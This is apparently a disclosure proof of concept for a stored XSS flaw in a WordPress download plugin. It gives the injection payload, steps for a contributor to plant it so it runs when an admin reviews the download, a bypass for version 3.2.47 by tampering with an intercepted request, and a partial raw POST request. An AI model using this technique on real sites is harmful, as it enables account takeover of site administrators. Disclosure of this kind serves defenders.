As a contributor, create/edit a download and put the following payload in the 'Insert URL" field:"><svg/onload=alert(/XSS/)>

Then click on the + button next to the field to save the URL and click on the Submit for Review button

The XSS will be triggered when editing the Download (for example when an admin will review it)

In 3.2.47, the attack is still possible by adding a dummy URL, then intercepting the request made when saving the File Post and changing the file[files][] parameter to"><svg/onload=alert(/XSS/)>:

POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1887
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1